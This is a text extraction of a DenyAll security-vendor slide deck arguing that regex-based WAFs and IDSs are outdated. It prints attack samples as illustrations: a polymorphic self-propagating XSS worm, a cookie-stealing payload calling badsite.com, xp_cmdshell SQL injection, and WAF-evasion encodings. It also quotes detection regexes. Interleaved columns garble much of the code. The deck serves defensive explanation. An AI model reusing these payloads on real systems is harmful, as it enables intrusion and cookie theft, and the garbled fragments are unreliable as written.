Dinausors will die

Download Report

Transcript Dinausors will die 

Renaud Bidou
DenyAll
PART I
ABOUT DINOSAURS
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
7/7/20157/7/2015
DenyAll © 2013
DenyAll © 2013
2
2
Dinosaurs Caracteristics
Basic
Deadly
???
Awkward
Stupid
But don’t get caught…
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
Huge
3
3
Dinosaurs Efficiency
• Dinosaurs are Huge and Deadly
 So why don’t you have a dinosaur ?
− To protect your home, your children, your car, your money …
1. Because they are extinguished
Good answer but try to be more imaginative
2. Because they are Stupid
They would eat me, my children, my car, my safe…
3. Because they are Basic and Awkward
They will miss an agile thief
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
4
4
They are still alive
Most of them
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
7/7/20157/7/2015
DenyAll © 2013
DenyAll © 2013
5
5
Species & Evolution
Filtering
Firewall-NG
Stateful Firewalls
Filtering Routers
Extinction
Detection & Prevention
Filtering Reverse Proxy
WAF
XML Firewalls
HIDS
Honeypots
Extinction
NIDS
IPS
DoS Protection
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
6
6
Dinosaurs Market Cap
$ 6,528,957,587
$ 11,014,181,827
$ 17,891,709,266
$ 109,504,360,000
$ 199,663,264,758
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
7
7
Dinosaurs Offering & Facts
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
8
8
BlackHat US 2013
•
EVADING DEEP INSPECTION FOR FUN AND SHELL
– Yet another I(D|P)S bypass talk
– Highlights that bypass techniques detailed back in 2006 are still not fixed
– Provides even more bypass techniques
•
FULLY ARBITRARY 802.3 PACKET INJECTION
– 100% innovation and research
– Found a way to “transform” UDP packets into TCP packets…
– Bypasses network firewalls… ANY network firewall…
•
') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND
OBFUSCATION TECHNIQUES’)%00
– Making SQL injections more efficient
– Bypassing WAF and I(D|P)S detection, again and again…
•
POST EXPLOITATION OPERATIONS WITH CLOUD SYNCHRONIZATION
SERVICES
– Exploiting cloud-based file systems to bypass DLP
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
9
9
PART II
CONTEXT OF EXTINCTION
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
7/7/20157/7/2015
DenyAll © 2013
DenyAll © 2013
10
10
Environmental changes
• Dinosaurs extinction is most probably due to a
combination of environmental factors
– Asteroid collision: Chicxulub Crater in Mexico
– Major eruptions: the Deccan traps near Reunion island
– Massive water withdrawal: due to pole ice caps formation
• Dinosaurs didn’t evolve fast enough…
• … while the rest of the ecosystem did
 THEY DIED
 HUMANS NOW RULE THE WORLD
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
11
11
IT environmental changes
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
7/7/20157/7/2015
DenyAll © 2013
DenyAll © 2013
12
12
New languages
 HTML5 opens doors between iframes and parents
 Browsers are turned into proxies
 Thousands of new evasion combinations
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
13
13
New format
no = separator between parameters names/values
• HTTP
2
no & separator between parameters
1
bookmarks_Link=www.example&bookmarks_Desc=my favorite website
• JSON
Play the 7 differences game
{"bookmarks":[{"Link":"www.example.com","Desc":"my favorite
website"}]}
suspicious characters
3
6
• XML/REST
tags
no explicit data stucture info
<bookmarks>
4 <Link>www.example.com</Link>
<Desc>my favorite website</Desc>
</bookmarks>
~ 5
7
linear vs. hierarchical
multiple valid representations
<bookmarks Link="www.example.com" Desc="my favorite website" />
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
14
14
Threats adapt to change…
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
7/7/20157/7/2015
DenyAll © 2013
DenyAll © 2013
15
15
No AlphaNum JavaScript
alert(1)
Common
=
([],[][[![]+[]][+[]][++[[]][+
[]]+[++[[]][+[]]][+[]]+[++[[]
][+[]]][+[]]]+[[]+{}][+[]][+!
![]]+[!![]+[]][+[]][+!![]]+[!
![]+[]][+[]][+[]]])()[[![]+[]
Will not be blocked if you
][+[]][++[[]][+[]]]+[![]+[]][
allow JSON structure
+[]][++[[]][+[]]+[++[[]][+[]]
characters…
][+[]]]+[![]+[]][+[]][++[[]][
+[]]+[++[[]][+[]]][+[]]+[++[[
]][+[]]][+[]]+[++[[]][+[]]][+
[]]]+[!![]+[]][+[]][+!![]]+[!
![]+[]][+[]][+[]]](+!![])
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
No AlphaNum
16
16
Polymorphic JavaScript
/*worm start*/
var k=209;
Initialisation vector
varvar
a=[ code = findSelf(document.body.innerHTML);
Packed Code
241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,167,176,163,241,162,165,176,163,165,133,190,186,180,191,241,236,2
41,246,254,251,166,190,163,188,241,162,165,176,163,165,251,254,246,253,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,24
if (code.indexOf('var k=') == 0) {
1,241,180,191,181,133,190,186,180,191,241,236,241,246,254,251,166,190,163,188,241,246,241,250,241,246,180,191,181,251,254,246,234,241,241,219
,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,183,164,191,178,165,184,190,191,241,180,191,178,190,181,180,249,
code = decode(code);
178,190,181,180,248,241,170,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,167,176,163,241,186,180,168,241,236,2
}
41,156,176,165,185,255,183,189,190,190,163,249,156,176,165,185,255,163,176,191,181,190,188,249,248,241,251,241,227,228,231,248,234,241,241,21
9,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,167,176,163,241,161,176,178,186,180,181,241,236
,241,162,165,176,163,165,133,190,186,180,191,241,250,241,246,167,176,163,241,186,236,246,241,250,241,186,180,168,241,250,241,246,234,167,176,
var encoded = encode(code);
163,241,176,236,138,246,234,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,183,190,1
var currentTime = new Date()
63,241,249,167,176,163,241,184,241,236,241,225,234,241,184,241,237,241,178,190,181,180,255,189,180,191,182,165,185,234,241,184,250,250,248,24
1,170,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,161,176,178,186,180,181,241,250,236,241,249
,178,190,181,180,255,178,185,176,163,146,190,181,180,144,165,249,184,248,241,143,241,186,180,168,248,241,250,241,246,253,246,234,241,241,219,
var variant = currentTime.getTime();
241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,172,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,2
41,241,241,241,241,241,241,241,161,176,178,186,180,181,241,250,236,241,246,140,234,167,176,163,241,181,236,141,246,141,246,234,246,241,250,24
1,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,246,183,190,163,241,249,167,176,163,241,184,236,225
var inject_code = 'name=Polymorphic&email='+variant+'&comments='+'<script>'+encoded+'<\/script>';
,234,184,237,176,255,189,180,191,182,165,185,234,184,250,250,248,246,241,250,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,
var request = new XMLHttpRequest();
241,241,241,241,241,241,241,241,241,241,241,241,246,170,181,250,236,130,165,163,184,191,182,255,183,163,190,188,146,185,176,163,146,190,181,1
80,249,176,138,184,140,143,186,248,234,172,180,167,176,189,249,181,248,234,246,241,250,241,180,191,181,133,190,186,180,191,234,241,241,219,24
request.open('post', 'http://10.1.3.22/cgi-bin/badstore.cgi?action=doguestbook');
1,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,163,180,165,164,163,191,241,161,176,178,186,180,181
,234,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,172,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
241,241,241,241,183,164,191,178,165,184,190,191,241,181,180,178,190,181,180,249,178,190,181,180,248,241,170,241,241,219,241,241,241,241,241,2
41,241,241,241,241,241,241,241,241,241,241,167,176,163,241,186,180,168,156,176,165,178,185,241,236,241,178,190,181,180,255,188,176,165,178,18
request.setRequestHeader("Content-length", inject_code.length);
5,249,254,167,176,163,141,162,186,236,249,141,181,250,248,254,248,234,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241
request.setRequestHeader("Connection", "close");
,241,241,241,241,241,241,241,241,184,183,241,249,186,180,168,156,176,165,178,185,241,236,236,241,191,164,189,189,248,241,170,241,241,219,241,
241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,176,189,180,163,165,249,246,186,180,168,241,191,190,165,241,183,1
90,164,191,181,246,248,234,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,24
request.send(inject_code);
1,241,163,180,165,164,163,191,234,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,172,241,241,219,241,241,241,241
,241,241,219,241,241,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,172,241,241,219,241,241,241,
241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,241,163,180,165,164,163,191,241,164,191,161,176,178,186,180,181,2
34,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,172,241,241,219,241,241,241,241,241,241,219,241,241,241,241,241,241,241,241,24
1,241,241,241,183,164,191,178,165,184,190,191,241,183,184,191,181,130,180,189,183,249,163,180,162,161,190,191,162,180,248,241,170,241,241,219
,241,176,165,180,181,241,178,190,181,180,241,190,164,165,241,165,190,241,176,241,165,180,169,165,176,163,180,176,255,241,241,219,241,241,241,
241,241,241,219,241,241,241,241,241,241,241,241,241,241,241,241,181,190,178,164,188,180,191,165,255,182,180,165,148,189,180,188,180,191,165,1
47,168,152,181,249,246,169,162,162,134,190,163,188,246,248,255,167,176,189,164,180,241,236,241,180,191,178,190,181,180,181,234,241,241,219,24
1,241,241,241,241,241,241,241,241,241,241,241
=
Your favorite CSRF \o/
];
var d='';
Decoding
for (var i=0;i<a.length;i++){d+=String.fromCharCode(a[i]^k);}
eval(d);
Execution
7/7/2015
Deny All © 2012
/*worm& end*/
7/7/2015
DenyAll © 2013
Securing
Accelerating Your Applications
17
17
HTML5-based screenshot
• Screenshots with XSS
– Thanks to HTML5 <canvas> tag…
Hacker
Relay
5. Hacker retrieves screenshot
1. Hacker exploits
XSS vulnerability
4. Victim sends
screenshot
3. Victim executes
Javascript
Victim Browser
Securing & Accelerating Your Applications
2. Malicious Javascript is loaded on Victim
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
Vulnerable App
18
18
Screenshot with XSS
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
19
19
Attackers get smarter…
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
7/7/20157/7/2015
DenyAll © 2013
DenyAll © 2013
20
20
Optimizing Injections
'IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE
• Lowering blind injection attempts
TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a
varchar(8000)
IF EXISTS(SELECT
* FROM dbo.sysobjects WHERE id
– New techniques
reduce “noise”
= object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY
id,N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell
[information_schema]>COLUMNS>COLUMN_DEFAULT
•[information_schema]>COLUMNS>IS_NULLABLE
Dumping
DB structure
with
request int,
2013
2009
(name
nvarchar(11),
min int, max
int, 1
config_value
2005
[information_schema]>COLUMNS>DATA_TYPE
run_value
int) INSERT %23xp_cmdshell EXEC
[information_schema]>COLUMNS>CHARACTER_MAXIMUM_LENGTH
[information_schema]>COLUMNS>CHARACTER_OCTET_LENGTH
master..sp_configure
'xp_cmdshell' IF EXISTS (SELECT * FROM
SELECT(@)FROM(SELECT(@:=0x00),(SELECT(@)FROM(informati
[information_schema]>COLUMNS>NUMERIC_PRECISION
%23xp_cmdshell
WHERE config_value=1)BEGIN CREATE TABLE
[information_schema]>COLUMNS>NUMERIC_SCALE
on_schema.columns)WHERE(table_schema>=@)AND(@)IN(@:=CO
•[information_schema]>COLUMNS>CHARACTER_SET_NAME
Remote
command execution
%23Data
(dir
varchar(8000))
INSERT %23Data EXEC
[information_schema]>COLUMNS>COLLATION_NAME
NCAT(@,0x0a,'[',table_schema,']>',table_name,'>',colum
[information_schema]>COLUMNS>COLUMN_TYPE
master..xp_cmdshell
SELECT @a=''
SELECT @a=Replace(@a
– Check to see if'dir'
xp_cmdshell
is loaded
n_name))))x;
[information_schema]>COLUMNS>COLUMN_KEY
%2B'<br></font><font
[information_schema]>COLUMNS>EXTRA
[information_schema]>COLUMNS>PRIVILEGES
– If enabled, check if active
color="black">'%2Bdir,'<dir>','</font><font
color="orange">')
[information_schema]>COLUMNS>COLUMN_COMMENT
[information_schema]>COLUMN_PRIVILEGES>GRANTEE
FROM
%23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT
–
Run the 'dir' command and store the results into TMP_DB
[information_schema]>COLUMN_PRIVILEGES>TABLE_CATALOG
@a='xp_cmdshell
not enabled' DROP TABLE %23xp_cmdshell END
[information_schema]>COLUMN_PRIVILEGES>TABLE_SCHEMA
[information_schema]>COLUMN_PRIVILEGES>TABLE_NAME
ELSE
SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO
[information_schema]>COLUMN_PRIVILEGES>COLUMN_NAME
TMP_DB-[information_schema]>COLUMN_PRIVILEGES>PRIVILEGE_TYPE
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
21
21
Evading detection in 2013
• Encode
C0 BC = 11000000 10111100
~ 11000000
• Split words
netstat = net\stat
= net^stat
• Comment “things”
00111100
=
C0 3C
-2 div 1 union all #in
#between comments
#in
#between comments
select 0x00, 0x41 like/*!31337table_name*/,3
from information_schema.tables limit 1
• Use unexpected “spaces”
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
22
22
Evasion: The Gig
Misformatted (but handled by most browsers) MS Unicode representation for <
%uC0BCaudio/\/\µ/src="ent.location='htt"
HTML5 Tag
id="p://badsite.com/steal?cookie=do/*sowhat*/cument.co/*noway*/okie'"
title="docum" ononline="eval(title+src+id)">
Surprisingly valid « space » substitution
document.location='http://badsite.com/steal?cookie=do/*sowhat*/cument.co/*noway*/okie'
document.location='http://badsite.com/steal?cookie=document.cookie'
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
23
23
PART III
THE END OF AN ERA
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
7/7/20157/7/2015
DenyAll © 2013
DenyAll © 2013
24
24
Status
IT Environment changes
Threats evolve
Attackers get smarter
…
Dinosaurs don’t
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
25
25
Wafosaurus Regexipus
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
7/7/20157/7/2015
DenyAll © 2013
DenyAll © 2013
26
26
Regexipus ?
Regexipus: n.f., gen., Regexus, Regular Expression
A sequence of characters that forms a search pattern
Core of past & present filtering engines (IDS, IPS, WAF)
Intensively used to create signatures against all types of suspicious content
Example: XSS protection through HTML event handling filtering
Asmus Rex: "/\\bonError(?:update)?\\W*=/Oi"
Snortus Fragilimus: "/\bonerror\b[\s]*=/Ri"
Modus Securitus: "(?i)([\s\"'`;\/0-9\=]+on\w+\s*=)"
Used in all wafosaurus either to provide positivus or negativus security models since late
90’s.
Probable causes of extinction:
• The canonical paradox
• The 1=1 syndrom
• The performance anomaly
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
27
27
The canonical paradox
Too many representations of the same string
Challenge: Have 1 UNION SELECT 1 evade a herd of Wafosauri
Tip: use encoding, substitution, databases specificities
Fortiwebus Minusculus
1 U%FFNION S%A0E%B1L%C2E%D3C%E4T%F6
Asmus Rex
1 UNION ALL SELECT 1
Libus Injectus
1fUNION%0ASELECT 1
Modus Securitus
1 MOD 0.2UNION%A0SELECT 1
ALL
1 MOD 0.2U%FFNION%A0ALL%A0S%A0E%B1L%C2E%D3C%E4T%F6
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
28
28
The 1=1 syndrom
1 like 1
1 = 1
2 <=> 3
2 = 2
1.0 = 1.0
not 1!=1
'a' <> 'b'
2 != 3
0.2 <= 7.9
17.5 – 3.12 < 1e3
0x50 = 0x50
0x2e REGEXP 0x2e
50 between 0 and 100
'b' between 'a' and 'c'
CHAR(97) RLIKE CHAR(97)
5 is not null
Securing & Accelerating Your Applications
3 > 2
chr(97) ~ chr(97)
'a' LIKE 'a'
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
29
29
1=1 syndrom effect
How to catch 'OR 1=1 and its variants ?
Asmus Rex
"/\\bx?or\\b(?:\\s|(?:\\/\\*.*?\\*\\/)|[()\\[\\]\\+])*(?:(?:\\d+|n?[
''\\x22].*?[''\\x22])|\\w+.*?\\(.*?\\)|(?:[x.()\\d+\\\\*\\/%~&|^\\s]|div)+(?:\\d)|null)+?(?:\\s|(?:\\/\\*.*?\\*\\/)|[()\\
[\\]])*(?:\\bnot\\b.*?)?(?:[=<>!^|&]+|\\br?like\\b|\\bbetween\\b|\\b
in\\b|\\bregexp\\b|(?:\\bis\\b.*?)(?:\\s|(?:\\/\\*.*?\\*\\/)|[()\\[\
\]\\+])*(?:\\bnot\\b.*?)?)+(?:.*?\\bBINARY\\b)?(?:\\s|(?:\\/\\*.*?\\
*\\/)|[()\\[\\]\\+])*(?:(?:\\d+|n?[''\\x22].*?[''\\x22]?)|\\w+.*?\\(
.*?\\)|[x.()\\d+\\-\\*\\/%~&|^\\s]+(?:\\d)|null)+?/Vsi"
Will not block
'or
0x2e
'or
17.5
'or
TRUE
–REGEXP
3.12
<0x2e
1e3
'or
not
1!=1
'or
chr(97)
etc
...
~ chr(97)
And maintenance may be questionable …
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
30
30
The performance anomaly
Improve Security
1 = 1 syndrom
Add thousands of rules
Modus Securitus
~20.000 rules
Impacts performances
Throughput, False-positives
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Canonical paradox
Handle more and more cases in each rules
Additional complexity leads to errors
/(?:\s|(?:\/\*.*?\*\/)|[()\[\]\+])*
union(?:\s|(?:\/\*.*?\*\/)|[()\[\]\
+])*select(?:\s|(?:\/\*.*?\*\/)|[()
~ (.*)*
\[\]\+])*(?:(?:\d+|n?[''\x22].*?[''
Reduce scope of analysis
\x22])|\w+.*?\(.*?\)|(?:[x.()\d+\EVIL REGEXP!!!!!!
\*\/%~&|^\s]|div)+(?:\d)|null)+/
Lower security
Deny All © 2012
DenyAll © 2013
31
31
The fall of Regexipi
• You wanted a T. Rex to secure your IT
Andyou
you’ve
THAT
• But
hadgot
to disengage
security
– Fear of false positive
• Disable features, create exceptions, stay in “warning” mode
– Lack of support for new protocols & data format
• Things have slightly changed those few last years…
– No real evolution for ages
• The negative/positive security models are older than the
Internet!
– Some platforms remain out of scope
• Voluntarily or not, part of your IT is not protected
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
32
32
PART III
WILDLIFE EVOLUTION
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
7/7/20157/7/2015
DenyAll © 2013
DenyAll © 2013
33
33
Evolve … or Die
• Traditional engines soon to be obsolete
– Linear filters won’t catch anything anymore
• Adding thousand of filters will increase latency
• Adding thousand of filters will increase false-positive rate
• Thousand of filters facing billions of combinations…
– Fear of false positives results in lowered security
– Current security engines distraught
• A new generation of engines is required
• NOW!!
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
34
34
Evolution Path
• Analyzing content is no longer efficient
– Split, encoded, substituted, inserted ...
– Format similar between legitimate and attack data
• No need (no chance ?) to fully understand
• Need to identify the nature of the content
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
35
35
Kill the Regexipi !
1. Extend Canonization
To deal with what you know
2. Identify the nature of content
{"bookmarks":[{"Link":"www.example.com","Desc":"my
favorite
Don’t try to understand, you just can’t
3.website"}]}
Be Agile
Evolve
the threats
([],[][[![]+[]][+[]][++[[]][+[]]+[++[[]]
'or
notwith
1!=1
Valid SQL
[+[]]][+[]]+[++[[]][+[]]][+[]]]+[[]+{}][
And keep control of your defenses
+[]][+!![]]+[!![]+[]][+[]][+!![]]+[!![]+
SELECT a FROM t WHERE id='a
[]][+[]][+[]]])()[[![]+[]][+[]][++[[]][+
bookmarks::Link=www.example.com&bookmarks::Desc=my%20favorite%web
Block of Javascript code
[]]]+[![]+[]][+[]][++[[]][+[]]+[++[[]][+
%site;
[]]][+[]]]+[![]+[]][+[]][++[[]][+[]]+[++
[[]][+[]]][+[]]+[++[[]][+[]]][+[]]+[++[[
]][+[]]][+[]]]+[!![]+[]][+[]][+!![]]+[!!
[]+[]][+[]][+[]]](+!![])
In short
Get smart
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
… or Die
Deny All © 2012
DenyAll © 2013
36
36
PART IV
ADVENT OF A NEW ERA
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
7/7/20157/7/2015
DenyAll © 2013
DenyAll © 2013
37
37
Humans
This small
species evolved
BUT THAT’S
ANOTHER STORY …
It is intelligent
It is agile
It builds and controls powerful weapons
Most of the time…
Securing & Accelerating Your Applications
7/7/2015
7/7/2015
Deny All © 2012
DenyAll © 2013
38
38
Questions
Answers
Securing & Accelerating Your Applications
7/7/2015
Deny All © 2012
7/7/20157/7/2015
DenyAll © 2013
DenyAll © 2013
39
39